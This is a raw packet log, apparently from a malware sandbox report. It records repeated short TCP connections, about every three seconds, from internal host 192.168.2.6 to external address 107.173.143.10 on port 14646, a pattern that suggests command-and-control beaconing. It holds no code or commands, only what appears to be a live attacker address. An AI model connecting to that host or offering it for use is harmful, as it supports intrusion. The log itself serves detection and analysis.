                                                                                                                    Dec 13, 2024 07:40:09.808322906 CET4997414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:09.928608894 CET1464649974107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:09.928718090 CET4997414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:09.932162046 CET4997414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:10.052149057 CET1464649974107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:11.871745110 CET1464649974107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:11.872216940 CET4997414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:11.894639015 CET4997414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:12.014575005 CET1464649974107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:12.903340101 CET4998314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:13.023247004 CET1464649983107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:13.023346901 CET4998314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:13.026870966 CET4998314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:13.147016048 CET1464649983107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:14.964476109 CET1464649983107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:14.964551926 CET4998314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:14.964987993 CET4998314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:15.084667921 CET1464649983107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:16.136779070 CET4999014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:16.256779909 CET1464649990107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:16.257848024 CET4999014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:16.261285067 CET4999014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:16.381022930 CET1464649990107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:18.199752092 CET1464649990107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:18.199825048 CET4999014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:18.199892998 CET4999014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:18.320437908 CET1464649990107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:19.214484930 CET4999814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:19.335186958 CET1464649998107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:19.335320950 CET4999814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:19.340518951 CET4999814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:19.460583925 CET1464649998107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:21.277409077 CET1464649998107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:21.277535915 CET4999814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:21.278089046 CET4999814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:21.397876024 CET1464649998107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:22.303082943 CET5000614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:22.422903061 CET1464650006107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:22.423021078 CET5000614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:22.462865114 CET5000614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:22.582587004 CET1464650006107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:24.355375051 CET1464650006107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:24.355592012 CET5000614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:24.355592012 CET5000614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:24.475944996 CET1464650006107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:25.370884895 CET5001514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:25.490791082 CET1464650015107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:25.491055012 CET5001514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:25.494900942 CET5001514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:25.614646912 CET1464650015107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:27.434457064 CET1464650015107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:27.434885025 CET5001514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:27.434885025 CET5001514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:27.554889917 CET1464650015107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:28.448987961 CET5001814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:28.568871975 CET1464650018107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:28.568953991 CET5001814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:28.573971987 CET5001814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:28.693730116 CET1464650018107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:30.512470961 CET1464650018107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:30.512639999 CET5001814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:30.512639999 CET5001814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:30.632515907 CET1464650018107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:31.526961088 CET5001914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:31.646917105 CET1464650019107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:31.647944927 CET5001914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:31.651781082 CET5001914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:31.771553040 CET1464650019107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:33.691895008 CET1464650019107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:33.691994905 CET5001914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:33.692074060 CET5001914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:33.811794043 CET1464650019107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:34.698909998 CET5002014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:34.818782091 CET1464650020107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:34.818938017 CET5002014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:34.823895931 CET5002014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:34.943802118 CET1464650020107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:36.765850067 CET1464650020107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:36.765950918 CET5002014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:36.766006947 CET5002014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:36.886042118 CET1464650020107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:37.746102095 CET5002114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:37.866043091 CET1464650021107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:37.866161108 CET5002114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:37.869719028 CET5002114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:37.989609957 CET1464650021107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:39.812659025 CET1464650021107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:39.817467928 CET5002114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:39.817523003 CET5002114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:39.937341928 CET1464650021107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:40.762350082 CET5002214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:40.882159948 CET1464650022107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:40.882272005 CET5002214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:40.886478901 CET5002214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:41.006541014 CET1464650022107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:42.824485064 CET1464650022107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:42.824567080 CET5002214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:42.824614048 CET5002214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:42.944428921 CET1464650022107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:43.730220079 CET5002314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:43.850241899 CET1464650023107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:43.852009058 CET5002314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:43.855866909 CET5002314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:43.975682020 CET1464650023107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:45.793252945 CET1464650023107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:45.793353081 CET5002314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:45.793394089 CET5002314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:45.913409948 CET1464650023107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:46.683199883 CET5002414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:46.803242922 CET1464650024107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:46.803672075 CET5002414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:46.807343960 CET5002414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:46.927124977 CET1464650024107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:48.750320911 CET1464650024107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:48.750423908 CET5002414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:48.750504017 CET5002414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:48.870207071 CET1464650024107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:49.608515024 CET5002514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:49.728426933 CET1464650025107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:49.728595018 CET5002514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:49.803968906 CET5002514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:49.923913956 CET1464650025107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:51.668464899 CET1464650025107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:51.668612957 CET5002514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:51.668668032 CET5002514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:51.788471937 CET1464650025107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:52.495775938 CET5002614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:52.615868092 CET1464650026107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:52.616136074 CET5002614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:52.658555031 CET5002614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:52.778464079 CET1464650026107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:54.584621906 CET1464650026107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:54.585616112 CET5002614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:54.585673094 CET5002614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:54.705563068 CET1464650026107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:55.389858007 CET5002714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:55.511564970 CET1464650027107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:55.512587070 CET5002714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:55.587475061 CET5002714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:55.707179070 CET1464650027107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:57.449558973 CET1464650027107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:57.449727058 CET5002714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:57.449727058 CET5002714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:57.569535971 CET1464650027107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:58.528317928 CET5002814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:58.648160934 CET1464650028107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:58.649568081 CET5002814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:58.664614916 CET5002814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:40:58.784393072 CET1464650028107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:00.590828896 CET1464650028107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:00.590897083 CET5002814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:00.590986967 CET5002814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:00.710855007 CET1464650028107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:01.339287043 CET5002914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:01.459501028 CET1464650029107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:01.460505962 CET5002914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:01.463635921 CET5002914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:01.583539963 CET1464650029107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:03.405148029 CET1464650029107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:03.405549049 CET5002914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:03.408219099 CET5002914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:03.527986050 CET1464650029107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:04.136281013 CET5003014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:04.256431103 CET1464650030107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:04.256565094 CET5003014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:04.259584904 CET5003014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:04.379498959 CET1464650030107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:06.219419003 CET1464650030107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:06.220763922 CET5003014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:06.220829964 CET5003014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:06.340702057 CET1464650030107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:06.917567968 CET5003214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:07.037475109 CET1464650032107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:07.037595034 CET5003214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:07.042709112 CET5003214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:07.162538052 CET1464650032107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:09.028120995 CET1464650032107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:09.028196096 CET5003214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:09.028296947 CET5003214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:09.148251057 CET1464650032107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:09.701925993 CET5003314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:09.821966887 CET1464650033107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:09.822094917 CET5003314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:09.827394962 CET5003314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:09.947215080 CET1464650033107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:11.762700081 CET1464650033107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:11.763700962 CET5003314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:11.763789892 CET5003314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:11.883646965 CET1464650033107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:12.418405056 CET5003414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:12.538297892 CET1464650034107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:12.538413048 CET5003414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:12.542335987 CET5003414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:12.662228107 CET1464650034107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:14.501120090 CET1464650034107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:14.501226902 CET5003414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:14.501226902 CET5003414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:14.621303082 CET1464650034107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:15.136253119 CET5003514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:15.256572962 CET1464650035107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:15.256774902 CET5003514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:15.260665894 CET5003514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:15.380482912 CET1464650035107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:17.204736948 CET1464650035107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:17.204840899 CET5003514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:17.204943895 CET5003514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:17.324743986 CET1464650035107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:17.808820009 CET5003614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:17.928845882 CET1464650036107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:17.928981066 CET5003614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:17.932640076 CET5003614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:18.052489996 CET1464650036107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:19.876583099 CET1464650036107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:19.876653910 CET5003614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:19.876696110 CET5003614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:19.996566057 CET1464650036107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:20.464407921 CET5003714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:20.584412098 CET1464650037107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:20.585724115 CET5003714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:20.589121103 CET5003714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:20.709038973 CET1464650037107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:22.528286934 CET1464650037107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:22.528369904 CET5003714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:22.528436899 CET5003714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:22.648490906 CET1464650037107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:23.105137110 CET5003814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:23.225227118 CET1464650038107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:23.225398064 CET5003814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:23.229090929 CET5003814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:23.348892927 CET1464650038107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:25.173295975 CET1464650038107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:25.173374891 CET5003814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:25.173432112 CET5003814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:25.321675062 CET1464650038107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:25.730593920 CET5003914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:25.850363970 CET1464650039107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:25.853766918 CET5003914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:25.857093096 CET5003914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:25.977123976 CET1464650039107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:27.798537970 CET1464650039107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:27.798618078 CET5003914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:27.798736095 CET5003914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:27.918561935 CET1464650039107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:28.339451075 CET5004014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:28.459537029 CET1464650040107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:28.459621906 CET5004014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:28.463121891 CET5004014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:28.583302975 CET1464650040107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:30.445139885 CET1464650040107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:30.449599028 CET5004014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:30.449886084 CET5004014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:30.569827080 CET1464650040107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:30.965010881 CET5004114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:31.085658073 CET1464650041107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:31.085760117 CET5004114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:31.089746952 CET5004114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:31.209595919 CET1464650041107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:33.032520056 CET1464650041107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:33.032753944 CET5004114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:33.032809019 CET5004114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:33.152766943 CET1464650041107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:33.526921988 CET5004214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:33.646980047 CET1464650042107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:33.649730921 CET5004214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:33.656326056 CET5004214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:33.776319981 CET1464650042107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:35.610647917 CET1464650042107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:35.613607883 CET5004214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:35.613652945 CET5004214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:35.733486891 CET1464650042107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:36.090061903 CET5004314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:36.210248947 CET1464650043107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:36.210362911 CET5004314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:36.214281082 CET5004314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:36.334252119 CET1464650043107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:38.138243914 CET1464650043107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:38.138463020 CET5004314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:38.138463020 CET5004314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:38.259000063 CET1464650043107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:38.605185032 CET5004414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:38.725337982 CET1464650044107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:38.725836039 CET5004414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:38.729197979 CET5004414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:38.849088907 CET1464650044107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:40.673593044 CET1464650044107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:40.676629066 CET5004414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:40.676681042 CET5004414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:40.796521902 CET1464650044107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:41.136179924 CET5004514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:41.256376028 CET1464650045107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:41.256500006 CET5004514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:41.259968996 CET5004514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:41.379869938 CET1464650045107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:43.185717106 CET1464650045107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:43.185847044 CET5004514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:43.185847044 CET5004514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:43.306345940 CET1464650045107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:43.620558977 CET5004614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:43.741384983 CET1464650046107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:43.741684914 CET5004614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:43.744708061 CET5004614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:43.865201950 CET1464650046107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:45.704817057 CET1464650046107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:45.707695007 CET5004614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:45.707735062 CET5004614646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:45.827507019 CET1464650046107.173.143.10192.168.2.6
